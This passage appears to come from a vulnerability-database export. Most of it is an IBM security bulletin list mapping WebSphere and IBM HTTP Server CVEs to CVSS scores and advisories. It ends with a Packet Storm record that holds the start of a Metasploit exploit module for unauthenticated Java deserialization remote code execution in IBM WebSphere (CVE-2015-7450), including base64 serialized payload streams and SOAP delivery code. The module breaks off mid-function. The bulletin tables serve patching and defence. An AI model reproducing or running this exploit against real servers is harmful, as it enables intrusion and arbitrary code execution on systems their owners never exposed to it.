3.5 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21669554>) | Not affected | 8.5, 8.0, 7.0 \n| CVE-2013-5802 | 2.6 | [IBM Java SDK for Oct 2013 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21655990>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-5780 | 4.3 | [IBM Java SDK for Oct 2013 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21655990>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-5704 | 5 | Not affected | [Bypass security](<http://www-01.ibm.com/support/docview.wss?uid=swg21672428>) | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-5425 | 3.5 | [Cross-site 
scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21651880>) | Not affected | 8.5 \n| CVE-2013-5418 | 3.5 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21651880>) | Not affected | 8.5, 8.0, 7.0 \n| CVE-2013-5417 | 4.3 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21651880>) | Not affected | 8.5, 8.0, 7.0, Liberty \n| CVE-2013-5414 | 3.5 | [Privilege escalation](<http://www-01.ibm.com/support/docview.wss?uid=swg21651880>) | Not affected | 8.5, 8.0, 7.0 \n| CVE-2013-5372 | 4.3 | [IBM Java SDK for Oct 2013 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21655990>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-4053 | 6.8 | [Privilege escalation](<http://www-01.ibm.com/support/docview.wss?uid=swg21647522>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-4052 | 4.3 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21647522>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-4039 | 4 | [Obtain sensitive information](<http://www-01.ibm.com/support/docview.wss?uid=swg21647485>) | Not affected | 8.5 \n| CVE-2013-4006 | 3.5 | [Obtain sensitive information](<http://www-01.ibm.com/support/docview.wss?uid=swg21651880>) | Not affected | Liberty \n| CVE-2013-4005 | 3.5 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21644047>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-4004 | 3.5 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21644047>) | Not affected | 8.5, 8.0 \n| CVE-2013-3029 | 4.3 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21640799>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-3024 | 6.9 | [Execute code](<http://www-01.ibm.com/support/docview.wss?uid=swg21639553>) | Not affected | 8.5 \n| CVE-2013-2976 | 1.9 | [Obtain sensitive information](<http://www-01.ibm.com/support/docview.wss?uid=swg21639553>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-2967 | 4.3 | [Cross-site 
scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21639553>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-1896 | 4.3 | Not affected | [Denial of Service](<http://www-01.ibm.com/support/docview.wss?uid=swg21643362>) | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-1862 | 5.1 | Not affected | [Command execution](<http://www-01.ibm.com/support/docview.wss?uid=swg21635991>) | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-1768 | 10 | [Deserialization](<http://www-01.ibm.com/support/docview.wss?uid=swg21635999>) | Not affected | 8.5, 8.0, 7.0, 6.1, Liberty \n| CVE-2013-1571 | 4.3 | [Clickjacking](<http://www-01.ibm.com/support/docview.wss?uid=swg21641387>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-0599 | 5 | [Obtain sensitive information](<http://www-01.ibm.com/support/docview.wss?uid=swg21651880>) | Not affected | 8.5 \n| CVE-2013-0597 | 3.5 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21635998>) | Not affected | 8.5, 8.0, 7.0, Liberty \n| CVE-2013-0596 | 4.3 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21647522>) | Not affected | 6.1 \n| CVE-2013-0565 | 4.3 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21632423>) | Not affected | 8.5 \n| CVE-2013-0544 | 3.5 | [File directory traversal](<http://www-01.ibm.com/support/docview.wss?uid=swg21632423>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-0543 | 6.8 | [Bypass security](<http://www-01.ibm.com/support/docview.wss?uid=swg21632423>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-0542 | 4.3 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21632423>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-0541 | 1.9 | [Buffer overflow](<http://www-01.ibm.com/support/docview.wss?uid=swg21632423>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-0540 | 4.9 | [Bypass security](<http://www-01.ibm.com/support/docview.wss?uid=swg21632423>) | Not affected | Liberty \n| CVE-2013-0482 | 2.6 | 
[Spoofing](<http://www-01.ibm.com/support/docview.wss?uid=swg21634646>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-0467 | 4 | [Obtain sensitive information](<http://www-01.ibm.com/support/docview.wss?uid=swg21651880>) | Not affected | 8.5 \n| CVE-2013-0464 | 4.3 | [Execute code](<http://www-01.ibm.com/support/docview.wss?uid=swg21651880>) | Not affected | 8.5, 8.0, \n| CVE-2013-0462 | 6.5 | [Bypass security](<http://www-01.ibm.com/support/docview.wss?uid=swg21632423>) | Not affected | 8.5, 8.0, 7.0, 6.1, Liberty \n| CVE-2013-0461 | 1.2 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21622444>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-0460 | 4.3 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21622444>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-0459 | 4.3 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21622444>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-0458 | 4.3 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21622444>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-0443 | 4 | [IBM Java SDK for Feb 2013 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21627634>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2013-0440 | 5 | [IBM Java SDK for Feb 2013 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21627634>) | Not affected | 8.5, 8.0, 7.0, 6.1 \nLucky Thirteen | CVE-2013-0169 | 4.3 | [IBM Java SDK for Feb 2013 CPU](<http://www-01.ibm.com/support/docview.wss?uid=swg21627634>) | [Side Channel Attack](<http://www-01.ibm.com/support/docview.wss?uid=swg21635988>) | 8.5, 8.0, 7.0, 6.1 \n \n**2012 CVEs**\n\n**Name**\n\n| \n\n**CVE**\n\n| \n\n**CVSS Score**\n\n| \n\n**WebSphere Application Server Bulletin or Assessment**\n\n| \n\n**IBM HTTP Server Bulletin or Assessment**\n\n| \n\n**Versions Affected** \n \n---|---|---|---|---|--- \n| CVE-2012-6153 | 4.3 | [Spoofing 
Vulnerability](<https://www.ibm.com/support/pages/node/6453091>) | Not affected | 9.0, 8.5, 8.0 \n| CVE-2012-5783 | 4.3 | [Spoofing attacks](<http://www-01.ibm.com/support/docview.wss?uid=swg22016216>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2012-4853 | 4.3 | [Cross-site request forgery](<http://www-01.ibm.com/support/docview.wss?uid=swg21614265>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2012-4851 | 4.3 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21614265>) | Not affected | Liberty \n| CVE-2012-4850 | 7.5 | [Privilege escalation](<http://www-01.ibm.com/support/docview.wss?uid=swg21614265>) | Not affected | Liberty \n| CVE-2012-3330 | 5 | [Denial of Service](<http://www-01.ibm.com/support/docview.wss?uid=swg21614265>) | Not affected | 8.5, 8.0, 7.0 \n| CVE-2012-3325 | 6 | [Bypass security](<http://www-01.ibm.com/support/docview.wss?uid=swg21609067>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2012-3311 | 3 | [Bypass security](<http://www-01.ibm.com/support/docview.wss?uid=swg21611313>) | Not affected | 8.5, 8.0, 7.0 \n| CVE-2012-3306 | 4.3 | [Weaker security](<http://www-01.ibm.com/support/docview.wss?uid=swg21611313>) | Not affected | 8.5, 8.0, 7.0 \n| CVE-2012-3305 | 5.8 | [File directory traversal](<http://www-01.ibm.com/support/docview.wss?uid=swg21611313>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2012-3304 | 6.8 | [Hijack session](<http://www-01.ibm.com/support/docview.wss?uid=swg21611313>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2012-3293 | 4.3 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21611313>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2012-2191 | 5 | Not affected | [Denial of Service](<http://www-01.ibm.com/support/docview.wss?uid=swg21606096>) | 8.5, 8.0, 7.0, 6.1 \n| CVE-2012-2190 | 5 | Not affected | [Denial of Service](<http://www-01.ibm.com/support/docview.wss?uid=swg21606096>) | 8.5, 8.0, 7.0, 6.1 \n| CVE-2012-2170 | 4.3 | [Obtain sensitive 
information](<http://www-01.ibm.com/support/docview.wss?uid=swg21595172>) | Not affected | 8.0, 7.0, 6.1 \n| CVE-2012-2159 | 4.3 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21606096>) | Not affected | 8.5, 8.0 \n| CVE-2012-2098 | 5 | [Denial of Service](<http://www-01.ibm.com/support/docview.wss?uid=swg21644047>) | Not affected | 8.5, 8.0, 7.0, 6.1 \n| CVE-2012-1148 | 5 | Not affected | [Denial of Service](<http://www-01.ibm.com/support/docview.wss?uid=swg21988026>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2012-1007 | 4.3 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg22016214>) | Not affected | 9.0, 8.5, 8.0, 7.0 \n| CVE-2012-0876 | 5 | Not affected | [Denial of Service](<http://www-01.ibm.com/support/docview.wss?uid=swg21988026>) | 9.0, 8.5, 8.0, 7.0 \n| CVE-2012-0720 | 4.3 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21587015>) | Not affected | 8.0, 7.0, 6.1 \n| CVE-2012-0717 | 2.6 | [Bypass security](<http://www-01.ibm.com/support/docview.wss?uid=swg21587015>) | Not affected | 7.0, 6.1 \n| CVE-2012-0716 | 4.3 | [Cross-site scripting](<http://www-01.ibm.com/support/docview.wss?uid=swg21587015>) | Not affected | 8.0, 7.0, 6.1 \n| CVE-2012-0193 | 5 | [Denial of Service](<http://www-01.ibm.com/support/docview.wss?uid=swg21587015>) | Not affected | 8.0, 7.0, 6.1 \n \n**2011 CVEs**\n\n**Name**\n\n| \n\n**CVE**\n\n| \n\n**CVSS Score**\n\n| \n\n**WebSphere Application Server Bulletin or Assessment**\n\n| \n\n**IBM HTTP Server Bulletin or Assessment**\n\n| \n\n**Versions Affected** \n \n---|---|---|---|---|--- \n| CVE-2011-4889 | 5 | [Weaker security](<http://www-01.ibm.com/support/docview.wss?uid=swg21587015>) | Not affected | 8.0, 7.0, 6.1 \n| CVE-2011-4343 | 5 | [Obtain sensitive information](<http://www-01.ibm.com/support/docview.wss?uid=swg22008707>) | Not affected | 8.5, 8.0, Liberty \n| CVE-2011-1498 | 5 | [Information Disclosure](<https://www.ibm.com/support/pages/node/6453091>) | Not 
affected | 9.0, 8.5, 8.0 \n| CVE-2011-1377 | 2.1 | [Weaker security](<http://www-01.ibm.com/support/docview.wss?uid=swg21589257>) | Not affected | 8.0, 7.0, 6.1 \n| CVE-2011-1376 | 4.4 | [Insecure permissions](<http://www-01.ibm.com/support/docview.wss?uid=swg21587015>) | Not affected | 8.0, 7.0, 6.1 \n \n**Important note:** IBM strongly suggests that all System z customers be subscribed to the System z Security Portal to receive the latest critical System z security and integrity service. If you are not subscribed, see the instructions on the [System z Security web site](<https://www.ibm.com/it-infrastructure/z/capabilities/system-integrity>). Security and integrity APARs and associated fixes will be posted to this portal. IBM suggests reviewing the CVSS scores and applying all security or integrity fixes as soon as possible to minimize any potential risk.\n\n[{\"Product\":{\"code\":\"SSEQTP\",\"label\":\"WebSphere Application Server\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Component\":\"Security\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"},{\"code\":\"PF012\",\"label\":\"IBM i\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF035\",\"label\":\"z\\/OS\"}],\"Version\":\"9.0.0.0;8.5.5;8.5;8.0;7.0;6.1\",\"Edition\":\"Advanced;Base;Developer;Express;Liberty;Network Deployment\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}},{\"Product\":{\"code\":\"SSEQTJ\",\"label\":\"IBM HTTP Server\"},\"Business Unit\":{\"code\":\"BU053\",\"label\":\"Cloud \\u0026 Data Platform\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"SSCKBL\",\"label\":\"WebSphere Application Server Hypervisor Edition\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM 
Software w\\/o TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}},{\"Product\":{\"code\":\"SSD28V\",\"label\":\"WebSphere Application Server Liberty Core\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-07-13T18:04:48", "type": "ibm", "title": "WebSphere Application Server and IBM HTTP Server Security Bulletin List", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1376", "CVE-2011-1377", "CVE-2011-1498", "CVE-2011-4343", "CVE-2011-4889", "CVE-2012-0193", "CVE-2012-0716", "CVE-2012-0717", "CVE-2012-0720", "CVE-2012-0876", "CVE-2012-1007", "CVE-2012-1148", "CVE-2012-2098", "CVE-2012-2159", "CVE-2012-2170", "CVE-2012-2190", "CVE-2012-2191", "CVE-2012-3293", "CVE-2012-3304", "CVE-2012-3305", "CVE-2012-3306", 
"CVE-2012-3311", "CVE-2012-3325", "CVE-2012-3330", "CVE-2012-4850", "CVE-2012-4851", "CVE-2012-4853", "CVE-2012-5783", "CVE-2012-6153", "CVE-2013-0169", "CVE-2013-0440", "CVE-2013-0443", "CVE-2013-0458", "CVE-2013-0459", "CVE-2013-0460", "CVE-2013-0461", "CVE-2013-0462", "CVE-2013-0464", "CVE-2013-0467", "CVE-2013-0482", "CVE-2013-0540", "CVE-2013-0541", "CVE-2013-0542", "CVE-2013-0543", "CVE-2013-0544", "CVE-2013-0565", "CVE-2013-0596", "CVE-2013-0597", "CVE-2013-0599", "CVE-2013-1571", "CVE-2013-1768", "CVE-2013-1862", "CVE-2013-1896", "CVE-2013-2967", "CVE-2013-2976", "CVE-2013-3024", "CVE-2013-3029", "CVE-2013-4004", "CVE-2013-4005", "CVE-2013-4006", "CVE-2013-4039", "CVE-2013-4052", "CVE-2013-4053", "CVE-2013-5372", "CVE-2013-5414", "CVE-2013-5417", "CVE-2013-5418", "CVE-2013-5425", "CVE-2013-5704", "CVE-2013-5780", "CVE-2013-5802", "CVE-2013-6323", "CVE-2013-6325", "CVE-2013-6329", "CVE-2013-6330", "CVE-2013-6438", "CVE-2013-6440", "CVE-2013-6725", "CVE-2013-6738", "CVE-2013-6747", "CVE-2014-0050", "CVE-2014-0076", "CVE-2014-0098", "CVE-2014-0114", "CVE-2014-0118", "CVE-2014-0160", "CVE-2014-0226", "CVE-2014-0231", "CVE-2014-0411", "CVE-2014-0453", "CVE-2014-0460", "CVE-2014-0823", "CVE-2014-0857", "CVE-2014-0859", "CVE-2014-0878", "CVE-2014-0891", "CVE-2014-0896", "CVE-2014-0963", "CVE-2014-0964", "CVE-2014-0965", "CVE-2014-3021", "CVE-2014-3022", "CVE-2014-3068", "CVE-2014-3070", "CVE-2014-3083", "CVE-2014-3566", "CVE-2014-3577", "CVE-2014-3603", "CVE-2014-4244", "CVE-2014-4263", "CVE-2014-4764", "CVE-2014-4767", "CVE-2014-4770", "CVE-2014-4816", "CVE-2014-6164", "CVE-2014-6166", "CVE-2014-6167", "CVE-2014-6174", "CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-6457", "CVE-2014-6512", "CVE-2014-6558", "CVE-2014-6593", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7189", "CVE-2014-7810", "CVE-2014-8730", "CVE-2014-8890", "CVE-2014-8917", "CVE-2015-0138", "CVE-2015-0174", "CVE-2015-0175", "CVE-2015-0204", "CVE-2015-0226", "CVE-2015-0235", 
"CVE-2015-0250", "CVE-2015-0254", "CVE-2015-0400", "CVE-2015-0410", "CVE-2015-0478", "CVE-2015-0488", "CVE-2015-0899", "CVE-2015-1283", "CVE-2015-1788", "CVE-2015-1829", "CVE-2015-1882", "CVE-2015-1885", "CVE-2015-1916", "CVE-2015-1920", "CVE-2015-1927", "CVE-2015-1931", "CVE-2015-1932", "CVE-2015-1936", "CVE-2015-1946", "CVE-2015-2017", "CVE-2015-2601", "CVE-2015-2613", "CVE-2015-2625", "CVE-2015-2808", "CVE-2015-3183", "CVE-2015-4000", "CVE-2015-4734", "CVE-2015-4749", "CVE-2015-4872", "CVE-2015-4938", "CVE-2015-4947", "CVE-2015-5006", "CVE-2015-5262", "CVE-2015-7417", "CVE-2015-7420", "CVE-2015-7450", "CVE-2015-7575", "CVE-2016-0201", "CVE-2016-0283", "CVE-2016-0306", "CVE-2016-0359", "CVE-2016-0360", "CVE-2016-0377", "CVE-2016-0378", "CVE-2016-0385", "CVE-2016-0389", "CVE-2016-0466", "CVE-2016-0475", "CVE-2016-0488", "CVE-2016-0702", "CVE-2016-0718", "CVE-2016-0800", "CVE-2016-1000031", "CVE-2016-1181", "CVE-2016-1182", "CVE-2016-2183", "CVE-2016-2923", "CVE-2016-2945", "CVE-2016-2960", "CVE-2016-3040", "CVE-2016-3042", "CVE-2016-3092", "CVE-2016-3426", "CVE-2016-3427", "CVE-2016-3485", "CVE-2016-4472", "CVE-2016-4975", "CVE-2016-5387", "CVE-2016-5546", "CVE-2016-5547", "CVE-2016-5548", "CVE-2016-5549", "CVE-2016-5573", "CVE-2016-5597", "CVE-2016-5983", "CVE-2016-5986", "CVE-2016-7056", "CVE-2016-8743", "CVE-2016-8919", "CVE-2016-8934", "CVE-2016-9736", "CVE-2017-10102", "CVE-2017-10115", "CVE-2017-10116", "CVE-2017-10356", "CVE-2017-10388", "CVE-2017-1121", "CVE-2017-1137", "CVE-2017-1151", "CVE-2017-1194", "CVE-2017-12613", "CVE-2017-12618", "CVE-2017-12624", "CVE-2017-1380", "CVE-2017-1381", "CVE-2017-1382", "CVE-2017-1501", "CVE-2017-1503", "CVE-2017-1504", "CVE-2017-15710", "CVE-2017-15715", "CVE-2017-1583", "CVE-2017-1681", "CVE-2017-1731", "CVE-2017-1741", "CVE-2017-1743", "CVE-2017-1788", "CVE-2017-3167", "CVE-2017-3511", "CVE-2017-3732", "CVE-2017-3736", "CVE-2017-5638", "CVE-2017-7668", "CVE-2017-7679", "CVE-2017-9798", "CVE-2018-10237", 
"CVE-2018-12539", "CVE-2018-12547", "CVE-2018-1301", "CVE-2018-1388", "CVE-2018-1426", "CVE-2018-1427", "CVE-2018-1447", "CVE-2018-1553", "CVE-2018-1567", "CVE-2018-1614", "CVE-2018-1621", "CVE-2018-1626", "CVE-2018-1643", "CVE-2018-1656", "CVE-2018-1683", "CVE-2018-1695", "CVE-2018-1719", "CVE-2018-17199", "CVE-2018-1755", "CVE-2018-1767", "CVE-2018-1770", "CVE-2018-1777", "CVE-2018-1793", "CVE-2018-1794", "CVE-2018-1797", "CVE-2018-1798", "CVE-2018-1840", "CVE-2018-1851", "CVE-2018-1890", "CVE-2018-1901", "CVE-2018-1902", "CVE-2018-1904", "CVE-2018-1905", "CVE-2018-1926", "CVE-2018-1957", "CVE-2018-1996", "CVE-2018-20843", "CVE-2018-25031", "CVE-2018-2579", "CVE-2018-2602", "CVE-2018-2603", "CVE-2018-2633", "CVE-2018-2634", "CVE-2018-2637", "CVE-2018-2783", "CVE-2018-2800", "CVE-2018-3139", "CVE-2018-3180", "CVE-2018-8039", "CVE-2019-0211", "CVE-2019-0220", "CVE-2019-10086", "CVE-2019-10092", "CVE-2019-10098", "CVE-2019-11777", "CVE-2019-12402", "CVE-2019-12406", "CVE-2019-17495", "CVE-2019-17566", "CVE-2019-17573", "CVE-2019-2426", "CVE-2019-2949", "CVE-2019-2989", "CVE-2019-4030", "CVE-2019-4046", "CVE-2019-4080", "CVE-2019-4268", "CVE-2019-4269", "CVE-2019-4270", "CVE-2019-4271", "CVE-2019-4279", "CVE-2019-4285", "CVE-2019-4304", "CVE-2019-4305", "CVE-2019-4441", "CVE-2019-4442", "CVE-2019-4477", "CVE-2019-4505", "CVE-2019-4663", "CVE-2019-4670", "CVE-2019-4720", "CVE-2019-4732", "CVE-2019-9512", "CVE-2019-9513", "CVE-2019-9514", "CVE-2019-9515", "CVE-2019-9517", "CVE-2019-9518", "CVE-2020-10693", "CVE-2020-11985", "CVE-2020-13938", "CVE-2020-14577", "CVE-2020-14578", "CVE-2020-14579", "CVE-2020-14581", "CVE-2020-14621", "CVE-2020-14781", "CVE-2020-14782", "CVE-2020-14797", "CVE-2020-1927", "CVE-2020-1934", "CVE-2020-2590", "CVE-2020-2593", "CVE-2020-2601", "CVE-2020-2654", "CVE-2020-27221", "CVE-2020-2754", "CVE-2020-2755", "CVE-2020-2773", "CVE-2020-2781", "CVE-2020-2800", "CVE-2020-4163", "CVE-2020-4276", "CVE-2020-4303", "CVE-2020-4304", "CVE-2020-4329", 
"CVE-2020-4362", "CVE-2020-4365", "CVE-2020-4421", "CVE-2020-4448", "CVE-2020-4449", "CVE-2020-4450", "CVE-2020-4464", "CVE-2020-4534", "CVE-2020-4575", "CVE-2020-4576", "CVE-2020-4578", "CVE-2020-4589", "CVE-2020-4590", "CVE-2020-4629", "CVE-2020-4643", "CVE-2020-4782", "CVE-2020-4949", "CVE-2020-5016", "CVE-2020-5258", "CVE-2021-20353", "CVE-2021-20354", "CVE-2021-20453", "CVE-2021-20454", "CVE-2021-20480", "CVE-2021-20492", "CVE-2021-20517", "CVE-2021-2161", "CVE-2021-23450", "CVE-2021-2369", "CVE-2021-26296", "CVE-2021-26690", "CVE-2021-26691", "CVE-2021-29736", "CVE-2021-29754", "CVE-2021-29842", "CVE-2021-30641", "CVE-2021-34798", "CVE-2021-35517", "CVE-2021-35550", "CVE-2021-35564", "CVE-2021-35578", "CVE-2021-35603", "CVE-2021-36090", "CVE-2021-38951", "CVE-2021-39031", "CVE-2021-39038", "CVE-2021-39275", "CVE-2021-40438", "CVE-2021-4104", "CVE-2021-44224", "CVE-2021-44228", "CVE-2021-44790", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105", "CVE-2021-45960", "CVE-2021-46143", "CVE-2021-46708", "CVE-2022-21229", "CVE-2022-21299", "CVE-2022-21340", "CVE-2022-21496", "CVE-2022-22310", "CVE-2022-22365", "CVE-2022-22393", "CVE-2022-22473", "CVE-2022-22475", "CVE-2022-22476", "CVE-2022-22477", "CVE-2022-22719", "CVE-2022-22720", "CVE-2022-22721", "CVE-2022-22822", "CVE-2022-22823", "CVE-2022-22824", "CVE-2022-22825", "CVE-2022-22826", "CVE-2022-22827", "CVE-2022-23302", "CVE-2022-23305", "CVE-2022-23307", "CVE-2022-23852", "CVE-2022-23990", "CVE-2022-25235", "CVE-2022-25236", "CVE-2022-25313", "CVE-2022-25315", "CVE-2022-26377", "CVE-2022-28614", "CVE-2022-28615", "CVE-2022-29404", "CVE-2022-30556", "CVE-2022-31813"], "modified": "2022-07-13T18:04:48", "id": "7E0744D5936EDC5F018B0850D801B665D388060D6A81B986BC7AD81C9A78C0EE", "href": "https://www.ibm.com/support/pages/node/710969", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2017-03-15T01:15:35", "description": "", "cvss3": {}, "published": 
"2017-03-14T00:00:00", "type": "packetstorm", "title": "IBM WebSphere Remote Code Execution Java Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-7450"], "modified": "2017-03-14T00:00:00", "id": "PACKETSTORM:141631", "href": "https://packetstormsecurity.com/files/141631/IBM-WebSphere-Remote-Code-Execution-Java-Deserialization.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Powershell \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"IBM WebSphere RCE Java Deserialization Vulnerability\", \n'Description' => %q{ \nThis module exploits a vulnerability in IBM's WebSphere Application Server. An unsafe deserialization \ncall of unauthenticated Java objects exists to the Apache Commons Collections (ACC) library, which allows \nremote arbitrary code execution. Authentication is not required in order to exploit this vulnerability. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Liatsis Fotios @liatsisfotios' # Metasploit Module \n \n# Thanks for helping me: \n# # # # # # # # # # # # \n \n# Kyprianos Vasilopoulos @kavasilo # Implemented and reviewed - Metasploit module \n# Dimitriadis Alexios @AlxDm_ # Assistance and code check \n# Kotsiopoulos Panagiotis # Guidance about Size and Buffer implementation \n], \n'References' => \n[ \n['CVE', '2015-7450'], \n['URL', 'https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java'], \n['URL', 'http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability'], \n['URL', 'https://www.tenable.com/plugins/index.php?view=single&id=87171'] \n], \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'IBM WebSphere 7.0.0.0', {} ] \n], \n'DisclosureDate' => \"Nov 6 2015\", \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'SSL' => true, \n'WfsDelay' => 20 \n})) \n \nregister_options([ \nOptString.new('TARGETURI', [true, 'The base IBM\\'s WebSphere SOAP path', '/']), \nOpt::RPORT('8880') \n], self.class) \nend \n \n \ndef exploit \n# Decode - Generate - Set Payload / Send SOAP Request \nsoap_request(set_payload) \nend \n \ndef set_payload \n# CommonCollections1 Serialized Streams \nccs_start = \"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\" \nccs_end = \"dAAEZXhlY3VxAH4AHgAAAAFxAH4AI3NxAH4AEXNyABFqYXZhLmxhbmcuSW50ZWdlchLioKT3gYc4AgABSQAFdmFsdWV4cgAQamF2YS5sYW5nLk51bWJlcoaslR0LlOCLAgAAeHAAAAABc3IAEWphdmEudXRpbC5IYXNoTWFwBQfawcMWYNEDAAJGAApsb2FkRmFjdG9ySQAJdGhyZXNob2xkeHA/QAAAAAAAEHcIAAAAEAAAAAB4eHZyABJqYXZhLmxhbmcuT3ZlcnJpZGUAAAAAAAAAAAAAAHhwcQB+ADo=\" \n \n# Generate Payload \npayload_exec = invoke_ccs(ccs_start) + gen_payload + invoke_ccs(ccs_end) \npayload_exec = Rex::Text.encode_base64(payload_exec) \nend \n \ndef invoke_ccs(serialized_stream) \n# Decode Serialized Streams \nserialized_stream = 
